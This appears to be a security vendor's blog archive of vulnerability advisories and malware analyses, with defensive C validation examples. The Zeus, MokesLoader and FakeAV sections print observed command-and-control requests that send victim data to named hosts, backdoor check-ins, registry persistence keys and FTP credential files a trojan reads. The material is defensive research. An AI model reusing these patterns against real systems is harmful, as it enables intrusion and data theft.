Posts

Trend Micro Control Manager Stack BO (Jan 27, 2012)

Trend Micro Control Manager is a command center for management of virus infections and other suspicious events. It consolidates the coordination of outbreak prevention actions and management of Trend Micro products and services. Control Manager provides facilities to allow the administrator to access and manipulate it through a web interface. The web interface is composed of various Java applets, ASP and HTML pages, as well as several ISAPI libraries.

One of Trend Micro Control Manager’s components is cmdprocessor.exe. This process uses a proprietary network protocol to communicate with other remote Trend Micro components. The structure of the network messages includes a common header which contains the length of the message, an identifying string, an opcode and opcode specific data.

A stack buffer overflow vulnerability has been discovered in the Trend Micro Control Manager component cmdprocessor.exe. Upon receiving a command with a certain opcode, the vulnerable code will allocate a stack buffer of 408 bytes to store a string field value provided in the received message. Subsequently, the received string is copied into the buffer, using the null character during the copy as the end of string marker. The code fails to verify that the destination buffer is large enough to hold the original string.

By supplying a message containing a large string in the affected field, data on the stack will be overwritten, including the return address and the SEH. A remote, unauthenticated attacker can exploit this vulnerability by sending a carefully crafted message to the vulnerable server. Successful exploitation may allow the attacker to cause a stack buffer overflow, potentially injecting and executing arbitrary code in the security context of the running service.
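As an added example (not Trend Micro's code; the wire layout, field offsets and identifier are assumptions), a header parser and a bounded copy of the string field that rejects any value which would not fit in the 408-byte buffer the advisory names, together with a constructed message to exercise it:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout (not the real proprietary format): 4-byte little-endian
 * total length, 8-byte identifying string, 2-byte opcode, then data. */
#define HDR_LEN   14
#define ID_LEN    8
#define FIELD_BUF 408   /* size of the stack buffer named in the advisory */

struct msg {
    uint32_t total_len;
    char ident[ID_LEN + 1];
    uint16_t opcode;
    const uint8_t *data;   /* opcode-specific data, inside the caller's buffer */
    size_t data_len;
};

static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24); }

/* Parse the common header; the declared length must fit what was received.
 * Returns 0 on success, -1 on a malformed header. */
int parse_header(const uint8_t *buf, size_t buflen, struct msg *m) {
    if (buflen < HDR_LEN) return -1;
    m->total_len = rd32le(buf);
    if (m->total_len < HDR_LEN || m->total_len > buflen) return -1;
    memcpy(m->ident, buf + 4, ID_LEN);
    m->ident[ID_LEN] = '\0';
    m->opcode = (uint16_t)(buf[12] | (buf[13] << 8));
    m->data = buf + HDR_LEN;
    m->data_len = m->total_len - HDR_LEN;
    return 0;
}

/* The flawed handler copied the string field up to its NUL terminator into
 * the 408-byte stack buffer without comparing lengths. This version bounds
 * the scan by the message and the copy by the buffer. Returns the string
 * length, or -1 if the field is unterminated or too long to fit. */
int copy_string_field(const struct msg *m, char out[FIELD_BUF]) {
    const uint8_t *nul = memchr(m->data, '\0', m->data_len);
    if (nul == NULL) return -1;          /* no terminator inside the message */
    size_t len = (size_t)(nul - m->data);
    if (len >= FIELD_BUF) return -1;     /* no room for string + terminator */
    memcpy(out, m->data, len + 1);
    return (int)len;
}

/* Constructed test message whose string field is `slen` 'A' characters. */
size_t build_msg(uint8_t *buf, size_t cap, size_t slen) {
    size_t total = HDR_LEN + slen + 1;
    if (total > cap) return 0;
    for (int i = 0; i < 4; i++) buf[i] = (uint8_t)(total >> (8 * i));
    memcpy(buf + 4, "CMDPROC1", ID_LEN);  /* constructed identifier */
    buf[12] = 0x10; buf[13] = 0x00;       /* constructed opcode */
    memset(buf + HDR_LEN, 'A', slen);
    buf[HDR_LEN + slen] = '\0';
    return total;
}

/* Parse and copy one constructed message; -1 means it was rejected. */
int handle_field(size_t slen) {
    uint8_t wire[2048]; char field[FIELD_BUF]; struct msg m;
    size_t n = build_msg(wire, sizeof wire, slen);
    if (n == 0 || parse_header(wire, n, &m) != 0) return -1;
    return copy_string_field(&m, field);
}
```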

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature was released:

  • 7317 – Trend Micro Control Manager Buffer Overflow

In addition to the signature released specifically to cover this issue, SonicWALL has numerous existing IPS signatures that detect and block known exploitation techniques and shellcode patterns that are likely to be utilized in attacks against vulnerabilities like this one. These signatures proactively detect and block exploits targeting new vulnerabilities.

This vulnerability has been assigned the id CVE-2011-5001 by MITRE.
The vendor has released an advisory addressing this issue.

Fake Canada Post Spam campaign leads to Trojan (Jan 20, 2012)

The Sonicwall UTM research team received reports of a new spam campaign purporting to come from Canada Post Corporation. The Trojan spreads by using an email that attempts to trick the user into downloading a delivery status PDF file.

Below is a screenshot of the email:

The email provides fake Canada Post URLs, one of which leads to the download of the Trojan: www.magya{removed}.net/trkEE710410485CN.pif

Once downloaded and run, the Trojan injects code into C:\WINDOWS\System32\wuauclt.exe and runs it.

The Trojan adds the following files to the filesystem:

  • C:\Documents and Settings\All Users\Local Settings\Temp\eldf1dff000f1071.exe [Detected as GAV: Injector.NDP_2 (Trojan)]
  • C:\Documents and Settings\{USER}\Local Settings\Temp\0114714.tmp [Detected as GAV: Injector.NDP_6 (Trojan)]

The Trojan adds the following key to the Windows registry to enable startup after reboot:

  • HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer\run “C:\Documents and Settings\All Users\Local Settings\Temp\eldf1dff000f1071.exe”

The Trojan makes the following DNS requests:

  • www.goo{removed}n.net
  • www.poli{removed}

The Trojan was observed posting potentially sensitive encrypted system information to a remote web server:

The Trojan was also observed making the following request to download additional malware from a remote web server:

The downloaded file mYhY8A9.exe is saved as C:\Documents and Settings\{USER}\Local Settings\Temp\0114714.tmp [Detected as GAV: Injector.NDP_6 (Trojan)]

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Injector.NDP (Trojan)
  • GAV: Injector.NDP_2 (Trojan)
  • GAV: Injector.NDP_3 (Trojan)
  • GAV: Injector.NDP_4 (Trojan)
  • GAV: Injector.NDP_6 (Trojan)
  • GAV: Injector.KLH (Trojan)

    Apple QuickTime JPEG 2000 Integer Underflow (Jan 18, 2012)

    QuickTime is an extensible proprietary multimedia framework developed by Apple Inc. It is capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity, including JPEG 2000 media data. QuickTime is integrated with Mac OS X, and it also supports Microsoft Windows.

    JPEG 2000 is an image compression standard and coding system. The JPEG 2000 specification was designed as a replacement to the original JPEG standard, providing features such as efficient variable quality decoding, and efficient low-resolution decoding. The standardized filename extension for JPEG 2000 data is .jp2 for ISO/IEC 15444-1 conforming files and .jpx for the extended part-2 specifications, published as ISO/IEC 15444-2. JPEG 2000 data is stored in codestreams.

    A codestream is a bit-sequence containing all information required for the decoding of an image. It consists of a main header, a sequence of tile-parts (which contain the actual image data), and finishes with an end-of-codestream (EOC) marker. A tile-part consists of a tile-part header and tile-part data. The main header of a codestream is composed of the following markers:

     | SOC | SIZ | COD | COC | QCD | QCC | RGN | POD | PPM | TLM | PLM | CME | 

    A vulnerability exists in Apple QuickTime when processing an invalid JPEG 2000 marker and its contents in JP2 files. Specifically, the vulnerability is due to an integer underflow in a calculation involving one of the marker's content values. A remote attacker may exploit this vulnerability to inject and execute malicious code on the target system; the malicious code would run in the security context of the target user.
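As an added example (not Apple's code), a validator for the main-header marker sequence described above that refuses a COD, or any other, marker segment whose length field is too small to subtract from, the underflow class this post names; marker codes and the minimum Lcod follow ISO/IEC 15444-1, and the sample codestream is constructed:

```c
#include <stddef.h>
#include <stdint.h>

/* Marker codes from ISO/IEC 15444-1 used here. */
#define MK_SOC 0xFF4F   /* start of codestream: the only marker without a length */
#define MK_COD 0xFF52   /* coding style default */
#define MK_SOT 0xFF90   /* start of tile-part: ends the main header */
#define MIN_LCOD 12     /* Lcod itself (2) + Scod (1) + SGcod (4) + SPcod (5) */

static uint16_t rd16be(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Walk the main header marker segments. Each marker after SOC is followed by
 * a 16-bit length L that counts itself but not the marker code, so the body
 * is L - 2. A decoder that forms L - 2 in an unsigned variable without first
 * requiring L >= 2 wraps to ~64K and reads far beyond the segment; that is the
 * underflow class this post describes. Returns the number of segments
 * validated before SOT, or -1 if the header is malformed. */
int validate_main_header(const uint8_t *cs, size_t len) {
    if (len < 2 || rd16be(cs) != MK_SOC) return -1;
    size_t pos = 2;
    int segs = 0;
    for (;;) {
        if (len - pos < 2) return -1;                 /* ran out without SOT */
        uint16_t marker = rd16be(cs + pos);
        if (marker == MK_SOT) return segs;            /* main header complete */
        if ((marker & 0xFF00) != 0xFF00 || len - pos < 4) return -1;
        uint16_t L = rd16be(cs + pos + 2);
        if (L < 2) return -1;                         /* L - 2 would underflow */
        if (L > len - pos - 2) return -1;             /* segment runs past buffer */
        const uint8_t *seg = cs + pos + 4;            /* first byte after L */
        if (marker == MK_COD) {
            if (L < MIN_LCOD) return -1;              /* fixed part must be present */
            /* Scod bit 0 set means one precinct-size byte per resolution level */
            size_t need = 10 + ((seg[0] & 1) ? (size_t)seg[5] + 1 : 0);
            if ((size_t)L - 2 != need) return -1;     /* body inconsistent with Scod/SPcod */
        }
        pos += 2 + (size_t)L;
        segs++;
    }
}

/* Constructed minimal main header: SOC, SIZ (zeroed body), COD with the
 * given Lcod, then SOT. Returns the number of bytes written. */
size_t build_header(uint8_t *out, uint16_t lcod) {
    static const uint8_t cod_body[10] = { 0x00, 0, 0, 1, 0, 5, 4, 4, 0, 1 }; /* Scod, SGcod, SPcod */
    size_t n = 0;
    out[n++] = 0xFF; out[n++] = 0x4F;                              /* SOC */
    out[n++] = 0xFF; out[n++] = 0x51; out[n++] = 0; out[n++] = 41; /* SIZ, Lsiz = 41 */
    for (int i = 0; i < 39; i++) out[n++] = 0;                     /* Lsiz - 2 body bytes */
    out[n++] = 0xFF; out[n++] = 0x52;                              /* COD */
    out[n++] = (uint8_t)(lcod >> 8); out[n++] = (uint8_t)lcod;
    for (int i = 0; i < 10; i++) out[n++] = cod_body[i];
    out[n++] = 0xFF; out[n++] = 0x90;                              /* SOT */
    return n;
}

/* Validate a constructed header whose COD declares `lcod`. */
int check_cod_length(uint16_t lcod) {
    uint8_t buf[80];
    return validate_main_header(buf, build_header(buf, lcod));
}
```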

    The SonicWALL UTM team has researched this vulnerability and released the following IPS signature to cover attack attempts targeting it:

    • 7298 Apple QuickTime JPEG 2000 COD Length Integer Underflow

    This vulnerability has been assigned CVE-2011-3250.

    Zeus spam campaigns continue – Year 2012 (Jan 13, 2012)

    The SonicWALL UTM Research team observed reports of multiple spam campaigns involving new variants of the Zeus Trojan. The most recent campaign involved emails pretending to be from the US Department of Homeland Security’s CERT division, warning the user of a phishing incident and carrying a zipped attachment. The zipped attachment in the email is a newer variant of the Zeus Trojan.

    Below is a sample of e-mail subjects and targeted organizations seen in these spam campaigns in the past week:

    • Phishing incident report call number: PH000000(Random Number)
      Spoofed: US Government- Computer Emergency Readiness Team
    • FDIC: About your business account (12 digit Alphanumeric)
      Spoofed: US Government- Federal Deposit Insurance Corporation
    • Your Billing Summary as of (DATE)
      Spoofed: Con Edison Inc.
    • DHL Parcel Tracking Notification (Random Number)
      Spoofed: DHL Courier service

    The SonicWALL Research team has received more than ten unique payloads in the past week from these campaigns. The Zeus binaries found in the zipped attachments from these campaigns look like:

    screenshot

    Upon execution, it performs the following activities:

    • Checks if it is running in a virtual environment (VBOX, VMware, Virtual PC) and contains anti-debugging code to thwart analysis.
    • Drops the following files on the system and runs them:

      • (Application Data)\feahulbofuiv.exe [Detected as GAV: Zbot.YW_163 (Trojan)]
      • (Temp)\tmp242dfb15.bat [Deletes the original file and then deletes itself]
    • Creates a registry entry to ensure that the dropped file runs on system reboot.
    • Connects to a remote C&C server based in China and sends the victim machine’s information:

        POST /stone2012.php HTTP/1.1
        Host: plantlunch.ru
        .....
        bn1=XXXX&sk1=XXXXX

        POST /jinjer.php HTTP/1.1
        Host: viperheart.ru

    SonicWALL Gateway AntiVirus provides proactive protection against these spam campaigns via the following signatures:

    • GAV: Zbot.YMH (Trojan)
    • GAV: Zbot.YW_163 (Trojan)

    screenshot

    Microsoft Security Bulletin Coverage (Jan 10, 2012)

    SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of January, 2012. A list of issues reported, along with SonicWALL coverage information follows:

    MS12-001 Vulnerability in Windows Kernel Could Allow Security Feature Bypass (2644615)

    • CVE-2012-0001 Windows Kernel SafeSEH Bypass Vulnerability
      This is a local vulnerability.

    MS12-002 Vulnerability in Windows Object Packager Could Allow Remote Code Execution (2603381)

    • CVE-2012-0009 Object Packager Insecure Executable Launching Vulnerability
      IPS: 3312 – Suspicious CIFS Traffic 17

    MS12-003 Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2646524)

    • CVE-2012-0005 CSRSS Elevation of Privilege Vulnerability
      This is a local vulnerability.

    MS12-004 Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391)

    • CVE-2012-0003 MIDI Remote Code Execution Vulnerability
      IPS: 7274 – Suspicious Audio 1b
    • CVE-2012-0004 DirectShow Remote Code Execution Vulnerability
      There is no way to distinguish between normal and attack traffic.

    MS12-005 Vulnerability in Microsoft Windows Could Allow Remote Code Execution (2584146)

    • CVE-2012-0013 Assembly Execution Vulnerability
      IPS: 7275 – Malformed PowerPoint Document 3b

    MS12-006 Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584)

    • CVE-2011-3389 SSL and TLS Protocols Vulnerability
      There is no way to distinguish between normal and attack traffic.

    MS12-007 Vulnerability in AntiXSS Library Could Allow Information Disclosure (2607664)

    • CVE-2012-0007 AntiXSS Library Bypass Vulnerability
      IPS: 3357 – MS IE CSS Cross Domain Information Disclosure 2

    DHL spam campaign leads to MokesLoader Trojan Downloader (Jan 06, 2012)

    The SonicWALL UTM Research team observed an increase in spam campaigns employing DHL package delivery schemes. The emails, pretending to be from DHL, inform the user of a package being sent to their address and that the relevant tracking number is in the attachment. The zipped attachment in the email is a newer variant of the MokesLoader Trojan downloader.

    Email subjects used in this spam campaign include:

    • DHL Delivery refuse
    • DHL Error package delivery
    • DHL shipment status No***
    • Error in the delivery address
    • Error in the delivery address No*******
    • Error package delivery
    • Get your parcel No***
    • Shipment Status No***
    • Track your parcel No******
    • Track your shipment No****

    The body of the email is as shown below:

     ---------------------------------------------------------------------
     Dear customer.

     Your package has been sent to your address.
     Please find a post label attached which contains a track number of
     your package.

     Thank you for your attention.
     DHL Global Services.
     ---------------------------------------------------------------------

    The following file with a misleading icon is present in the zip attachment:

    screenshot

    It performs the following activities when executed:

    • It creates the following files:
      • %appdata%\csrss.exe (Copy of itself) [Detected as GAV: MokesLoader.MS (Trojan)]
      • %appdata%\Microsoft\Protect\qbfbv.xx
      • %appdata%\Microsoft\Protect\rpphtrt.nv
    • It reports the new infection to a remote server using a uniquely generated login id:
      • GET /aaa/index.php?cmd=getload&login={removed}&sel=sp3ya&ver=5.1&bits=0&file=1&run=ok
    • It creates the following registry entries to ensure infection on reboot:
      • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run Clients “%appdata%\csrss.exe”
      • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mcoyr “rundll32 %appdata%\MICROS~1\Protect\rpphtrt.nv, itgn”
      • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run imfblgk “rundll32 %appdata%\MICROS~1\Protect\qbfbv.xx, namn”
    • It creates a TCP backdoor on the infected machine:
      screenshot
    • It reports the backdoor port to the remote server:
      • GET /aaa/index.php?cmd=getsocks&login={removed}&port=2592 HTTP/1.1
    • The following commands were used to communicate with the remote server:
      • getgrab
      • getproxy
      • getload
      • getsocks
    • It receives instructions from the remote server and downloads additional malware.

    SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

    • GAV: MokesLoader.MS (Trojan)
    • GAV: MokesLoader.MK (Trojan)
    • GAV: MokesLoader.LS (Trojan)
    • GAV: MokesLoader.LH (Trojan)
    • GAV: Dofoil.L#email (Trojan)

    screenshot

    IWS Remote Agent Module Design Weakness (Jan 5, 2012)

    InduSoft Web Studio (IWS) is a collection of automation tools that provide all the building blocks to develop HMIs (Human-Machine Interfaces), SCADA (Supervisory Control and Data Acquisition) systems and embedded instrumentation solutions. Typically, an InduSoft Web Studio project runs on an embedded Windows device, which connects to machines, processors or other data-acquisition equipment. The embedded Windows device can connect to a Remote Agent component, which supports various message types in order to handle different tasks.

    A design flaw exists in the Remote Agent component of InduSoft Web Studio. Specifically, the vulnerability is due to a lack of authentication when handling client requests. A remote attacker can exploit this vulnerability by sending a crafted message to the Remote Agent component. Successful exploitation can result in arbitrary file creation or code execution in the security context of the Remote Agent process.

    The vulnerability has been assigned CVE-2011-4051.

    SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

    • 7265 InduSoft Web Studio Remote Code Execution

    Microsoft out-of-band Bulletin MS11-100 (Dec 30, 2011)

    Microsoft has released an out-of-band bulletin MS11-100 addressing four vulnerabilities on Dec 29th, 2011. The bulletin is rated by Microsoft as critical, and the vulnerabilities are listed as below:

    • Collisions in HashTable May Cause DoS Vulnerability – CVE-2011-3414
    • Insecure Redirect in .NET Form Authentication Vulnerability – CVE-2011-3415
    • ASP.Net Forms Authentication Bypass Vulnerability – CVE-2011-3416
    • ASP.NET Forms Authentication Ticket Caching Vulnerability – CVE-2011-3417

    The SonicWALL UTM team researched these vulnerabilities the same day and created several IPS signatures to capture the attack traffic. Due to the nature of the vulnerabilities, it is hard to distinguish legitimate traffic from attack traffic for some of them. The covered vulnerabilities and their IPS signatures are listed below:

    • Collisions in HashTable May Cause DoS Vulnerability – CVE-2011-3414
      • 7260 Microsoft .NET Framework Denial of Service
      • 7261 Microsoft .NET Framework Denial of Service 2
    • Insecure Redirect in .NET Form Authentication Vulnerability – CVE-2011-3415
      • 7262 ASP.NET Forms Authentication Redirect Vulnerability
    • ASP.Net Forms Authentication Bypass Vulnerability – CVE-2011-3416
      • 7263 ASP.NET Forms Authentication Bypass 1
      • 7264 ASP.NET Forms Authentication Bypass 2

    For the Microsoft vulnerabilities covered by SonicWALL, please refer to SonicWALL MAPP for details.

    American Airlines Ticket Spam – XP Home Security 2012 (Dec 22, 2011)

    The Sonicwall UTM research team discovered a new spam campaign spreading a well known FakeAV: XP Home Security 2012.

    The Trojan spreads through email and arrives as a zipped email attachment purporting to be from American Airlines:

    The Trojan uses the following icon in an attempt to masquerade as a harmless PDF file:

    The Trojan performs the following DNS queries:

    • www.mortg{removed}.tv
    • www.google.com
    • refunados{removed}.ru
    • www.tria{removed}.org

    The Trojan spawns and injects code into svchost.exe causing it to make the following HTTP GET request from a compromised remote webserver:

    The Trojan downloads 1.exe, renames it to gio.exe and executes it. It uses the following icon:

    The Trojan adds the following files to the filesystem:

    • C:\Documents and Settings\{USER}\Local Settings\Application Data\gio.exe [Detected as GAV: FakeAv.JICD (Trojan)]
    • C:\Documents and Settings\{USER}\Application Data\csrss.exe [Detected as GAV: Bredo.T (Trojan)]
    • C:\Documents and Settings\{USER}\Local Settings\Application Data\708j72l30qfte5ro4u62483b417elw [Detected as GAV: FakeAvCn.C (Trojan)]

    The Trojan adds the following keys to the Windows registry:

    • HKEY_CLASSES_ROOT\J2\shell\open\command “C:\Documents and Settings\{USER}\Local Settings\Application Data\gio.exe” -a “%1” %*
    • HKEY_CLASSES_ROOT\.exe\shell\open\command “C:\Documents and Settings\{USER}\Local Settings\Application Data\gio.exe” -a “%1” %*
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run “WinRAR SFX” “C:\Documents and Settings\{USER}\Application Data\csrss.exe”
    • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run “bieovju rundll32 C:\DOCUME~1\{USER}\APPLIC~1\MICROS~1\Protect\yxikrlc.n, dquc”

    The Trojan deletes the following keys from the Windows registry to disable automatic updates:

    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WUAUSER
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv

    The Trojan runs gio.exe using the following command line:

        "C:\Documents and Settings\{USER}\Local Settings\Application Data\gio.exe" -dtm -a

    The Trojan pops up the following FakeAV windows in an attempt to fool the user into buying the software:

    The Trojan blocks certain applications from running such as Task Manager, and Internet Explorer:

    The Trojan was observed opening the following files and directories:

        C:\Program Files\Common Files\Ipswitch\WS_FTP\*.*0x00
        C:\Documents and Settings\{USER}\Application Data\Ipswitch\WS_FTP\Sites\*.*
        C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat
        C:\Documents and Settings\{USER}\Application Data\FileZilla\sitemanager.xml
        C:\Documents and Settings\{USER}\Application Data\FileZilla\recentservers.xml

    SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

    • GAV: Bredo.T (Trojan)
    • GAV: FakeAv.JICD (Trojan)
    • GAV: FakeAvCn.C (Trojan)

    Microsoft Publisher Memory Corruption (Dec 21, 2011)

    Microsoft Publisher is a document design application for print, web, and various other formats. Publisher is available individually or as part of the Microsoft Office suite. The default file extension for Publisher files is pub.

    The Publisher file format specification is not publicly available. It does share some features with other Microsoft file formats. Publisher files are stored in the Microsoft Compound File meta-format, which specifies a virtual filesystem encapsulated within a file. In a Compound Document, data is stored in streams within storages. Publisher data is known to reside in the Root Entry\Contents and Root Entry\Escher\EscherStm streams.

    The streams appear in a common form, outlined in the following tables:

     Offset   Length           Description
     -------  ---------------  --------------------------------
     0x0000   4                structure size (n)
     0x0004   n-4              structure data

    Structure data is composed of a variable number of consecutive fields, which have the following format:

     Offset   Length           Description
     -------  ---------------  --------------------------------
     0x0000   2                index and type (two-byte structure)
     0x0002   4                size n (present based on type value)
     0x0006   n-4              data

    The size of the data field and the presence of the size field depend on the type. Types 16, 18, 20, 24, and 26 seem to indicate the presence of the size field, and in these cases the data field begins at offset 0x0006. Types that do not indicate the presence of the size field have an implied size that is known to the application, and their data begins at offset 0x0002. Additionally, Publisher files are also known to contain OfficeArt records. Some OfficeArt records are specified by the host application, and can contain structures encoded in the above format. In particular, the OfficeArtClientAnchor record encodes data using this method.

    A memory corruption vulnerability exists in Microsoft Publisher. The flaw is due to the way in which variable-length fields are processed. The size field value is not validated and is used in the calculation of a pointer that is then used to read the data field value.

    A remote attacker can entice a target user to open a specially crafted Microsoft Publisher document to exploit this vulnerability. A successful exploitation attempt may result in arbitrary code execution. An unsuccessful attempt may crash the affected application. Exploiting this vulnerability for code execution is not trivial; however, it is possible.
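As an added example (not Microsoft's or SonicWALL's code), a walker over the field format tabulated above that checks every size field against the enclosing structure before advancing its pointer; the split of the index/type word (low byte taken as the type) and the implied sizes of the size-less types are assumptions, since the post does not give them:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32le(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Types the post says carry the explicit 4-byte size field. */
static int has_size_field(unsigned type) {
    return type == 16 || type == 18 || type == 20 || type == 24 || type == 26;
}

/* Implied data sizes for size-less types are application knowledge the post
 * does not give; this table is an assumption for the example (0 = unknown). */
static size_t implied_size(unsigned type) {
    switch (type) { case 2: return 2; case 4: return 4; case 8: return 8; default: return 0; }
}

/* Walk the fields of one structure ([size n][n-4 bytes of fields]). The split
 * of the 2-byte "index and type" word is assumed: low byte = type. Returns the
 * field count, or -1 if a size would place the data pointer outside the
 * structure, the unchecked pointer calculation the post describes. */
int walk_structure(const uint8_t *buf, size_t buflen) {
    if (buflen < 4) return -1;
    uint32_t n = rd32le(buf);
    if (n < 4 || n > buflen) return -1;           /* declared size vs. buffer */
    size_t pos = 4, end = n;
    int fields = 0;
    while (pos < end) {
        if (end - pos < 2) return -1;
        unsigned type = buf[pos];                  /* assumed low-byte type */
        size_t data_len;
        if (has_size_field(type)) {
            if (end - pos < 6) return -1;          /* size field itself truncated */
            uint32_t sz = rd32le(buf + pos + 2);
            if (sz < 4) return -1;                 /* sz - 4 would underflow */
            if (sz - 4 > end - pos - 6) return -1; /* data would run past end */
            data_len = sz - 4;
            pos += 6;                              /* data begins at 0x0006 */
        } else {
            data_len = implied_size(type);
            if (data_len == 0 || data_len > end - pos - 2) return -1;
            pos += 2;                              /* data begins at 0x0002 */
        }
        pos += data_len;                           /* buf + pos is now the next field */
        fields++;
    }
    return fields;
}
/* Constructed structure: a type-16 field with `dlen` data bytes whose size
 * field declares `declared`, followed by a type-4 field (implied 4 bytes). */
size_t build_structure(uint8_t *out, size_t cap, uint32_t declared, size_t dlen) {
    size_t total = 4 + 6 + dlen + 2 + 4;
    if (total > cap) return 0;
    wr32le(out, (uint32_t)total);
    out[4] = 16; out[5] = 1;                  /* type 16, index 1 (assumed split) */
    wr32le(out + 6, declared);
    memset(out + 10, 0xAB, dlen);             /* constructed data bytes */
    out[10 + dlen] = 4; out[11 + dlen] = 2;   /* type 4, index 2 */
    wr32le(out + 12 + dlen, 0x11223344u);
    return total;
}
/* Walk a constructed structure whose first field declares size `declared`. */
int check_declared_size(uint32_t declared, size_t dlen) {
    uint8_t buf[256];
    return walk_structure(buf, build_structure(buf, sizeof buf, declared, dlen));
}
```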

    SonicWALL has released two IPS signatures to address known exploits targeting this vulnerability. The following signatures have been released:

    • 7227 – Malformed Publisher Document 4b
    • 7237 – MS Publisher Array Indexing Memory Corruption (MS11-091)

    In addition to the specific signatures released to address this threat, SonicWALL has existing sets of IPS signatures which proactively detect and block widely used exploitation techniques that may be utilized in attacks against this particular vulnerability.

    The vendor has released a security bulletin addressing this issue. The vulnerability has been assigned CVE-2011-3411 by MITRE.